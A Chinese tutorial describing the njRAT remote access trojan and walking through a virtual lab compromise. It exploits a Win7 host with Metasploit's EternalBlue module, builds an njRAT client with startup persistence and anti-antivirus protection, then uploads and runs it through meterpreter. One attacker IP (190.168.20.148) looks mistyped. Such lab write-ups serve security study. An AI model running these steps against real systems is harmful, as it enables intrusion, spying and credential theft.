目录
一、njRAT 介绍
njRAT,也称为Bladabindi,[1]是一种远程访问工具(RAT) 或木马,它允许程序的持有者控制最终用户的计算机。它于 2013 年 6 月首次被发现,其中一些变体可追溯到 2012 年 11 月。它是由来自不同国家的名为 Sparclyheason 的黑客组织制作的,经常用于攻击中东的目标。它可以通过网络钓鱼和受感染的驱动器传播。
RedPacket Security 将 NJRat 描述为“远程访问木马 (RAT) 具有记录击键、访问受害者的相机、窃取浏览器中存储的凭据、打开反向外壳、上传/下载文件、查看受害者的桌面、执行进程、文件、和注册表操作,以及让攻击者更新、卸载、重启、关闭、断开 RAT 并重命名其活动 ID 的能力。通过命令与控制 (CnC) 服务器软件,攻击者有能力创建和配置恶意软件以进行传播通过 USB 驱动器。”
特点:
操作文件
打开远程shell,允许攻击者使用命令行
打开进程管理器以杀死进程
操作系统注册表
记录电脑的摄像头和麦克风
记录击键
窃取存储在 Web 浏览器或其他应用程序中的密码
二、实验案例
1. 实验环境
- 攻击机:win7-Ultime 192.168.20.149、Kali Linux 2021 190.168.20.148
- 靶机:Win7-x64 192.168.20.130
2. 实验过程
(1)获取临时权限
使用 Metasploit 中的 exploit 进行渗透测试,获取临时权限,进入 meterpreter 环境
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.20.130
exploit
(2)使用 njRAT 生成远控程序
设置监听端口
使用 builder 模块创建一个远控程序
Host:hacker 的电脑 ip
ExeName:进程名称
Directory:所在目录
Protect Process:保护进程,防止被杀软清除
Copy To StartUp:开机启动
Registy StartUp:注册表启动
(3)使用 Kali 上传该远控程序到靶机
meterpreter > upload /home/kali/Desktop/Client.exe c:\\Client.exe
(4)远程运行该远控程序
meterpreter > shell # 获取反弹 shell
C:\Windows\system32>cd c:// # 切换到远控软件所在的目录
c:\>Client.exe # 执行远控软件
(5)靶机在服务端上线,成功远控靶机
此时已成功控制靶机,可以使用 njRAT 对靶机进行下一步操作,如文件管理、远程桌面、麦克风、运行脚本、发起对话等操作。
三、参考资料
对njrat的初步了解 远控实验及流量分析_m0_46377671的博客-CSDN博客
本文章仅作技术学习作用,一切实验皆在个人虚拟环境下进行!